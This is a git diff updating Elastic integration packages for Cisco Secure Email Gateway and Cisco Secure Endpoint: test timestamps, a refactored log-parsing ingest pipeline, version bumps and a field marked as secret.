+356,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "address": "1.128.3.4", @@ -396,7 +396,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -430,7 +430,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -464,17 +464,17 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { "name": "mail_logs" }, "delivery_connection_id": "8", + "email_participants": "('from', 'service-account@example.com'), ('reply-to', 'service-account@example.com'), ('to', 'userA@example.com, userB@example.com')", "message": "Message done DCID 8 MID 6 to RID [0] [('from', 'service-account@example.com'), ('reply-to', 'service-account@example.com'), ('to', 'userA@example.com, userB@example.com')]", "message_status": "Message done", - "recipient_id": "0", - "email_participants": "('from', 'service-account@example.com'), ('reply-to', 'service-account@example.com'), ('to', 'userA@example.com, userB@example.com')" + "recipient_id": "0" } }, "ecs": { @@ -499,7 +499,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -529,7 +529,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -559,7 +559,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -596,7 +596,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -626,7 +626,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -665,7 +665,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -704,7 +704,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -753,7 +753,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -786,7 +786,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -818,7 +818,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -850,7 +850,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -882,7 +882,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -914,7 +914,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -946,7 +946,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -978,7 +978,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1011,7 +1011,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1043,7 +1043,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1075,7 +1075,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1110,7 +1110,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1150,7 +1150,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1183,7 +1183,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1215,7 +1215,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1263,7 +1263,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1299,7 +1299,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1341,7 +1341,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1377,7 +1377,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { diff --git a/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 52010b787e9..3978e0ccf2a 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -21,8 +21,8 @@ processors: - grok: field: event.original patterns: - - '^(?:<%{NUMBER:log.syslog.priority:long}>)?%{SYSLOGTIMESTAMP:_tmp.timestamp} %{DATA:cisco_secure_email_gateway.log.category.name}: %{WORD:log.level}: %{GREEDYDATA:cisco_secure_email_gateway.log.message}$' - - '^(?:<%{NUMBER:log.syslog.priority:long}>)?%{SYSLOGTIMESTAMP:_tmp.timestamp} %{DATA:cisco_secure_email_gateway.log.category.name}: %{GREEDYDATA:cisco_secure_email_gateway.log.message}$' + - '^(?:<%{NUMBER:log.syslog.priority:long}>)?%{SYSLOGTIMESTAMP:_tmp.timestamp} (?:%{HOSTNAME:cisco_secure_email_gateway.log.host} )?%{DATA:cisco_secure_email_gateway.log.category.name}: %{WORD:log.level}: %{GREEDYDATA:cisco_secure_email_gateway.log.message}$' + - '^(?:<%{NUMBER:log.syslog.priority:long}>)?%{SYSLOGTIMESTAMP:_tmp.timestamp} (?:%{HOSTNAME:cisco_secure_email_gateway.log.host} )?%{DATA:cisco_secure_email_gateway.log.category.name}: %{GREEDYDATA:cisco_secure_email_gateway.log.message}$' - '^%{DATA:_tmp.timestamp} %{WORD:log.level}: %{GREEDYDATA:cisco_secure_email_gateway.log.message}$' - '^%{GREEDYDATA:cisco_secure_email_gateway.log.message}$' - trim: diff --git a/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/pipeline_amp.yml b/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/pipeline_amp.yml index 4ade6d3a389..ccbdadac4f5 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/pipeline_amp.yml +++ b/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/pipeline_amp.yml @@ -10,7 +10,7 @@ processors: - '^Response received for file reputation query from (Cloud|Cache). %{GREEDYDATA:_tmp.new_message}$' - '^File Analysis complete. SHA256: %{GREEDYDATA:email.attachments.file.hash.sha256}, Submit Timestamp: %{GREEDYDATA:_tmp.submit.timestamp}, Update Timestamp: %{GREEDYDATA:_tmp.update.timestamp}, Disposition: %{DATA:cisco_secure_email_gateway.log.disposition} Score: %{NUMBER:cisco_secure_email_gateway.log.score:long}, run_id: %{NUMBER:cisco_secure_email_gateway.log.run_id} Details: %{DATA:cisco_secure_email_gateway.log.details} Spyname:\[%{GREEDYDATA:cisco_secure_email_gateway.log.spy_name}\]$' - '^(?i)File not uploaded for analysis.\s+MID = %{NUMBER:email.message_id},? File SHA256\[%{GREEDYDATA:email.attachments.file.hash.sha256}\],? File mime\[%{GREEDYDATA:email.attachments.file.mime_type}\],? Reason: %{GREEDYDATA:event.reason}$' - - '^File analysis upload skipped. SHA256: %{GREEDYDATA:email.attachments.file.hash.sha256},Timestamp\[%{GREEDYDATA:_tmp.submit.timestamp}\] details\[%{GREEDYDATA:_tmp.cisco_secure_email_gateway.log.remaining_details}]$' + - '^File analysis upload skipped. SHA256: %{GREEDYDATA:email.attachments.file.hash.sha256},Timestamp\[%{GREEDYDATA:_tmp.submit.timestamp}\] details\[%{GREEDYDATA:_tmp.cisco_secure_email_gateway.log.remaining_details}\]$' - '^SHA256: %{GREEDYDATA:email.attachments.file.hash.sha256},Timestamp\[%{GREEDYDATA:_tmp.submit.timestamp}\] details\[%{GREEDYDATA:cisco_secure_email_gateway.log.server_error_details}\]$' - '^Retrospective verdict received. %{GREEDYDATA:_tmp.new_message}$' - '^%{GREEDYDATA:cisco_secure_email_gateway.log.message}$' diff --git a/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/pipeline_consolidated_event.yml b/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/pipeline_consolidated_event.yml index 39ebafd09ac..07a6491d63a 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/pipeline_consolidated_event.yml +++ b/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/pipeline_consolidated_event.yml @@ -14,81 +14,339 @@ processors: \\|%{DATA:cisco_secure_email_gateway.log.event_class_id}\ \\|%{DATA:cisco_secure_email_gateway.log.event.name}\ \\|%{WORD:event.severity}\ - \\|%{DATA:_tmp.details}%{SPACE}\ - (?:%{ENDTIME}=%{DATA:event.end}%{SPACE})?\ - (?:ESADKIMVerdict=%{WORD:cisco_secure_email_gateway.log.esa.dkim_verdict} )?\ - (?:ESADLPVerdict=%{WORD:cisco_secure_email_gateway.log.esa.dlp_verdict} )?\ - (?:dvc=%{IP:cisco_secure_email_gateway.log.data.ip} )?\ - (?:ESAAttachmentDetails=%{DATA:cisco_secure_email_gateway.log.esa.attachment_details} )?\ - (?:ESAFriendlyFrom=%{DATA:cisco_secure_email_gateway.log.esa.friendly_from} )?\ - (?:ESAGMVerdict=%{WORD:cisco_secure_email_gateway.log.esa.graymail_verdict} )?\ - (?:%{STARTTIME}=%{DATA:event.start}%{SPACE})?\ - (?:(deviceInboundInterface||deviceOutboundInterface)=%{WORD:cisco_secure_email_gateway.log.listener.name} )?\ - (?:deviceDirection=%{DATA:cisco_secure_email_gateway.log.device_direction} )?\ - (?:ESAMailFlowPolicy=%{WORD:cisco_secure_email_gateway.log.esa.mail_flow_policy} )?\ - (?:suser=%{DATA:email.from.address} )?\ - (?:cs1Label=%{WORD:cisco_secure_email_gateway.log.cs1_label}%{SPACE}\ - cs1=%{DATA:cisco_secure_email_gateway.log.cs1} )?\ - (?:cs2Label=%{WORD:cisco_secure_email_gateway.log.cs2_label}%{SPACE}\ - cs2=%{DATA:cisco_secure_email_gateway.log.cs2} )?\ - (?:ESAMFVerdict=%{WORD:cisco_secure_email_gateway.log.esa.mf_verdict} )?\ - (?:act=%{WORD:cisco_secure_email_gateway.log.act} )?\ - (?:ESAFinalActionDetails=%{DATA:cisco_secure_email_gateway.log.esa.final_action_details} )?\ - (?:cs4Label=%{DATA:cisco_secure_email_gateway.log.cs4_label} )?\ - (?:cs4='<%{DATA:cisco_secure_email_gateway.log.cs4}>' )?\ - (?:ESAMsgSize=%{NUMBER:cisco_secure_email_gateway.log.esa.msg_size:long} )?\ - (?:ESAOFVerdict=%{WORD:cisco_secure_email_gateway.log.esa.outbreak_filter_verdict} )?\ - (?:duser=%{DATA:email.to.address} )?\ - (?:ESAHeloDomain=%{DATA:cisco_secure_email_gateway.log.esa.helo.domain} )?\ - (?:ESAHeloIP=%{IP:cisco_secure_email_gateway.log.esa.helo.ip} )?\ - (?:ESAReplyTo=%{DATA:cisco_secure_email_gateway.log.esa.reply_to} )?\ - (?:cfp1Label=%{WORD:cisco_secure_email_gateway.log.cfp1_label}%{SPACE}\ - cfp1=%{DATA:_tmp.cfp1} )?\ - (?:ESASDRDomainAge=%{DATA:cisco_secure_email_gateway.log.esa.sdr_consolidated_domain_age} )?\ - (?:cs3Label=%{WORD:cisco_secure_email_gateway.log.cs3_label} )?\ - (?:cs3=%{DATA:cisco_secure_email_gateway.log.cs3} )?\ - (?:cs6Label=%{DATA:cisco_secure_email_gateway.log.cs6_label} )?\ - (?:cs6=%{DATA:cisco_secure_email_gateway.log.cs6} )?\ - (?:ESASPFVerdict=%{DATA:cisco_secure_email_gateway.log.esa.spf_verdict} )?\ - (?:%{SOURCEHOSTNAME}=%{DATA:source.domain} )?\ - (?:ESASenderGroup=%{DATA:cisco_secure_email_gateway.log.esa.sender_group} )?\ - (?:%{SOURCEADDRESS}=%{IP:source.ip} )?\ - msg=%{GREEDYDATA:_tmp.msg}$" - - ^%{GREEDYDATA:cisco_secure_email_gateway.log.message}$ - pattern_definitions: - STARTTIME: '(startTime|start)' - ENDTIME: '(endTime|end)' - SOURCEADDRESS: '(sourceAddress|src)' - SOURCEHOSTNAME: '(sourceHostName|shost)' - - grok: - field: _tmp.msg - if: ctx._tmp?.msg != null - patterns: - - "^['\"]%{DATA:email.subject}['\"](?:$|\\s)\ - (?:ESAURLDetails=%{DATA:cisco_secure_email_gateway.log.esa.url_details}(?:$|\\s))?\ - (?:ESATLSInCipher=%{DATA:cisco_secure_email_gateway.log.esa.tls.in.cipher} )?\ - (?:ESATLSInConnStatus=%{WORD:cisco_secure_email_gateway.log.esa.tls.in.connection_status} )?\ - (?:ESATLSInProtocol=%{DATA:cisco_secure_email_gateway.log.esa.tls.in.protocol} )?\ - (?:ESATLSOutCipher=%{DATA:cisco_secure_email_gateway.log.esa.tls.out.cipher} )?\ - (?:ESATLSOutConnStatus=%{WORD:cisco_secure_email_gateway.log.esa.tls.out.connection_status} )?\ - (?:ESATLSOutProtocol=%{DATA:cisco_secure_email_gateway.log.esa.tls.out.protocol}(?:$|\\s))?\ - (?:ESADaneHost=%{DATA:cisco_secure_email_gateway.log.esa.dane.host} )?\ - (?:ESADaneStatus=%{WORD:cisco_secure_email_gateway.log.esa.dane.status}(?:$|\\s))?\ - (?:ESADHASource=%{IP:cisco_secure_email_gateway.log.esa.dha_source}(?:$|\\s))?\ - (?:ESADMARCVerdict=%{WORD:cisco_secure_email_gateway.log.esa.dmarc_verdict}(?:$|\\s))?\ - (?:cs5Label=%{DATA:cisco_secure_email_gateway.log.cs5_label}(?:$|\\s))?\ - (?:cs5=%{DATA:cisco_secure_email_gateway.log.cs5}(?:$|\\s))?\ - (?:ESAMARAction=%{DATA:cisco_secure_email_gateway.log.esa.mail_auto_remediation_action}(?:$|\\s))?\ - (?:ESAMsgTooBigFromSender=%{WORD:cisco_secure_email_gateway.log.esa.msg_too_big_from_sender}(?:$|\\s))?\ - (?:ESARateLimitedIP=%{GREEDYDATA:cisco_secure_email_gateway.log.esa.rate_limited_ip}(?:$|\\s))?$" - - ^%{GREEDYDATA:cisco_secure_email_gateway.log.message}$ + \\|%{GREEDYDATA:_tmp.details}$" - kv: field: _tmp.details + target_field: _tmp.fields if: ctx._tmp?.details != null - field_split: ' | ' + field_split: '(?:((\s+)?$|\s+(?=\w+=)))' value_split: '=' ignore_failure: true ignore_missing: true + - rename: + field: _tmp.fields.ESAAttachmentDetails + target_field: cisco_secure_email_gateway.log.esa.attachment_details + ignore_missing: true + ignore_failure: true + - convert: + field: _tmp.fields.ESADHASource + target_field: cisco_secure_email_gateway.log.esa.dha_source + if: ctx._tmp?.fields?.ESADHASource != null + type: ip + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESADKIMVerdict + target_field: cisco_secure_email_gateway.log.esa.dkim_verdict + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESADLPVerdict + target_field: cisco_secure_email_gateway.log.esa.dlp_verdict + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESADMARCVerdict + target_field: cisco_secure_email_gateway.log.esa.dmarc_verdict + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESADaneHost + target_field: cisco_secure_email_gateway.log.esa.dane.host + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESADaneStatus + target_field: cisco_secure_email_gateway.log.esa.dane.status + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAFinalActionDetails + target_field: cisco_secure_email_gateway.log.esa.final_action_details + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAFriendlyFrom + target_field: cisco_secure_email_gateway.log.esa.friendly_from + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAGMVerdict + target_field: cisco_secure_email_gateway.log.esa.graymail_verdict + ignore_missing: true + ignore_failure: true + - urldecode: + field: _tmp.fields.ESAHeloDomain + target_field: cisco_secure_email_gateway.log.esa.helo.domain + ignore_missing: true + ignore_failure: true + - convert: + field: _tmp.fields.ESAHeloIP + target_field: cisco_secure_email_gateway.log.esa.helo.ip + if: ctx._tmp?.fields?.ESAHeloIP != null + type: ip + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAMARAction + target_field: cisco_secure_email_gateway.log.esa.mail_auto_remediation_action + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAMFVerdict + target_field: cisco_secure_email_gateway.log.esa.mf_verdict + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAMailFlowPolicy + target_field: cisco_secure_email_gateway.log.esa.mail_flow_policy + ignore_missing: true + ignore_failure: true + - convert: + field: _tmp.fields.ESAMsgSize + target_field: cisco_secure_email_gateway.log.esa.msg_size + type: long + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAMsgTooBigFromSender + target_field: cisco_secure_email_gateway.log.esa.msg_too_big_from_sender + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAOFVerdict + target_field: cisco_secure_email_gateway.log.esa.outbreak_filter_verdict + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESARateLimitedIP + target_field: cisco_secure_email_gateway.log.esa.rate_limited_ip + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAReplyTo + target_field: cisco_secure_email_gateway.log.esa.reply_to + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESASDRDomainAge + target_field: cisco_secure_email_gateway.log.esa.sdr_consolidated_domain_age + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESASPFVerdict + target_field: cisco_secure_email_gateway.log.esa.spf_verdict + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESASenderGroup + target_field: cisco_secure_email_gateway.log.esa.sender_group + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESATLSInCipher + target_field: cisco_secure_email_gateway.log.esa.tls.in.cipher + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESATLSInConnStatus + target_field: cisco_secure_email_gateway.log.esa.tls.in.connection_status + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESATLSInProtocol + target_field: cisco_secure_email_gateway.log.esa.tls.in.protocol + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESATLSOutCipher + target_field: cisco_secure_email_gateway.log.esa.tls.out.cipher + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESATLSOutConnStatus + target_field: cisco_secure_email_gateway.log.esa.tls.out.connection_status + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESATLSOutProtocol + target_field: cisco_secure_email_gateway.log.esa.tls.out.protocol + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAURLDetails + target_field: cisco_secure_email_gateway.log.esa.url_details + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.act + target_field: cisco_secure_email_gateway.log.act + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cfp1Label + target_field: cisco_secure_email_gateway.log.cfp1_label + ignore_missing: true + ignore_failure: true + - convert: + field: _tmp.fields.cfp1 + target_field: cisco_secure_email_gateway.log.cfp1 + type: double + if: "ctx._tmp?.fields?.cfp1 != 'None' && ctx._tmp?.fields?.cfp1 != 'not enabled'" + ignore_missing: true + on_failure: + - remove: + field: _tmp.cfp1 + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - rename: + field: _tmp.fields.cs1Label + target_field: cisco_secure_email_gateway.log.cs1_label + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs1 + target_field: cisco_secure_email_gateway.log.cs1 + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs2Label + target_field: cisco_secure_email_gateway.log.cs2_label + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs2 + target_field: cisco_secure_email_gateway.log.cs2 + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs3Label + target_field: cisco_secure_email_gateway.log.cs3_label + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs3 + target_field: cisco_secure_email_gateway.log.cs3 + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs4Label + target_field: cisco_secure_email_gateway.log.cs4_label + ignore_missing: true + ignore_failure: true + - gsub: + field: _tmp.fields.cs4 + target_field: cisco_secure_email_gateway.log.cs4 + if: ctx._tmp?.fields?.cs4 != null && ctx._tmp?.fields?.cs4 != "''" + pattern: "^'<|>'$" + replacement: "" + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs5Label + target_field: cisco_secure_email_gateway.log.cs5_label + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs5 + target_field: cisco_secure_email_gateway.log.cs5 + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs6Label + target_field: cisco_secure_email_gateway.log.cs6_label + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs6 + target_field: cisco_secure_email_gateway.log.cs6 + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.deviceDirection + target_field: cisco_secure_email_gateway.log.device_direction + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.deviceInboundInterface + target_field: cisco_secure_email_gateway.log.listener.name + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.deviceOutboundInterface + target_field: cisco_secure_email_gateway.log.listener.name + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.duser + target_field: email.to.address + ignore_missing: true + ignore_failure: true + - convert: + field: _tmp.fields.dvc + target_field : cisco_secure_email_gateway.log.data.ip + type: ip + if: ctx._tmp?.fields?.dvc != null + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.endTime + target_field: event.end + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.end + target_field: event.end + ignore_missing: true + ignore_failure: true + - urldecode: + field: _tmp.fields.sourceHostName + target_field: source.domain + ignore_missing: true + ignore_failure: true + - urldecode: + field: _tmp.fields.shost + target_field: source.domain + ignore_missing: true + ignore_failure: true + - convert: + field: _tmp.fields.sourceAddress + target_field: source.ip + if: ctx._tmp?.fields?.sourceAddress != null + type: ip + ignore_missing: true + ignore_failure: true + - convert: + field: _tmp.fields.src + target_field: source.ip + if: ctx._tmp?.fields?.src != null + type: ip + ignore_missing: true + ignore_failure: true + - gsub: + field: _tmp.fields.msg + target_field: email.subject + if: ctx._tmp?.fields?.msg != null + pattern: (?:^['"]|['"]$) + replacement: "" + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.suser + target_field: email.from.address + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.startTime + target_field: event.start + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.start + target_field: event.start + ignore_missing: true + ignore_failure: true - append: field: related.ip value: '{{{cisco_secure_email_gateway.log.esa.helo.ip}}}' @@ -128,50 +386,38 @@ processors: if: ctx.cisco_secure_email_gateway?.log?.device_direction == '1' ignore_failure: true - rename: - field: deviceExternalId + field: _tmp.fields.deviceExternalId target_field: host.id ignore_missing: true - rename: - field: ESAMID + field: _tmp.fields.ESAMID target_field: email.message_id ignore_missing: true ignore_failure: true - rename: - field: ESAICID + field: _tmp.fields.ESAICID target_field: cisco_secure_email_gateway.log.esa.injection_connection_id ignore_missing: true - rename: - field: ESADCID + field: _tmp.fields.ESADCID target_field: cisco_secure_email_gateway.log.esa.delivery_connection_id ignore_missing: true - rename: - field: ESAAMPVerdict + field: _tmp.fields.ESAAMPVerdict target_field: cisco_secure_email_gateway.log.esa.amp_verdict ignore_missing: true - rename: - field: ESAASVerdict + field: _tmp.fields.ESAASVerdict target_field: cisco_secure_email_gateway.log.esa.as_verdict ignore_missing: true - rename: - field: ESAAVVerdict + field: _tmp.fields.ESAAVVerdict target_field: cisco_secure_email_gateway.log.esa.av_verdict ignore_missing: true - rename: - field: ESACFVerdict + field: _tmp.fields.ESACFVerdict target_field: cisco_secure_email_gateway.log.esa.content_filter_verdict ignore_missing: true - - convert: - field: _tmp.cfp1 - target_field: cisco_secure_email_gateway.log.cfp1 - type: double - if: "ctx._tmp?.cfp1 != 'None' && ctx._tmp?.cfp1 != 'not enabled'" - ignore_missing: true - on_failure: - - remove: - field: _tmp.cfp1 - - append: - field: error.message - value: '{{{_ingest.on_failure_message}}}' - date: field: _tmp.timestamp timezone: '{{{event.timezone}}}' @@ -207,6 +453,7 @@ processors: target_field: event.start timezone: '{{{event.timezone}}}' if: ctx.event?.start != null + tag: date event.start formats: - E MMM dd HH:mm:ss yyyy - E MMM d HH:mm:ss yyyy @@ -223,6 +470,7 @@ processors: field: event.start target_field: event.start if: ctx.event?.start != null + tag: date re-parse event.start formats: - E MMM dd HH:mm:ss yyyy - E MMM d HH:mm:ss yyyy @@ -242,6 +490,7 @@ processors: target_field: event.end timezone: '{{{event.timezone}}}' if: ctx.event?.end != null + tag: date event.end formats: - E MMM dd HH:mm:ss yyyy - E MMM d HH:mm:ss yyyy @@ -258,6 +507,7 @@ processors: field: event.end target_field: event.end if: ctx.event?.end != null + tag: date re-parse event.end formats: - E MMM dd HH:mm:ss yyyy - E MMM d HH:mm:ss yyyy @@ -283,4 +533,5 @@ on_failure: value: pipeline_error - append: field: error.message - value: '{{{ _ingest.on_failure_message }}}' + value: |- + Processor "{{ _ingest.on_failure_processor_type }}" with tag "{{ _ingest.on_failure_processor_tag }}" in pipeline "{{ _ingest.on_failure_pipeline }}" failed with message "{{ _ingest.on_failure_message }}" diff --git a/packages/cisco_secure_email_gateway/manifest.yml b/packages/cisco_secure_email_gateway/manifest.yml index 73bcde92f42..a57df751722 100644 --- a/packages/cisco_secure_email_gateway/manifest.yml +++ b/packages/cisco_secure_email_gateway/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: cisco_secure_email_gateway title: Cisco Secure Email Gateway -version: "1.22.1" +version: "1.23.2" description: Collect logs from Cisco Secure Email Gateway with Elastic Agent. type: integration categories: diff --git a/packages/cisco_secure_endpoint/changelog.yml b/packages/cisco_secure_endpoint/changelog.yml index a4509ab8864..417fbf5c7cf 100644 --- a/packages/cisco_secure_endpoint/changelog.yml +++ b/packages/cisco_secure_endpoint/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.25.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "2.24.2" changes: - description: Fix ingest pipeline conditional field handling. diff --git a/packages/cisco_secure_endpoint/data_stream/event/manifest.yml b/packages/cisco_secure_endpoint/data_stream/event/manifest.yml index 0e0cd752a44..d43f4d20890 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/manifest.yml +++ b/packages/cisco_secure_endpoint/data_stream/event/manifest.yml @@ -24,6 +24,7 @@ streams: multi: false required: true show_user: true + secret: true - name: http_client_timeout type: text title: HTTP Client Timeout diff --git a/packages/cisco_secure_endpoint/manifest.yml b/packages/cisco_secure_endpoint/manifest.yml index b263c17ee6e..01c4358f0cc 100644 --- a/packages/cisco_secure_endpoint/manifest.yml +++ b/packages/cisco_secure_endpoint/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: cisco_secure_endpoint title: Cisco Secure Endpoint -version: "2.24.2" +version: "2.25.0" description: Collect logs from Cisco Secure Endpoint (AMP) with Elastic 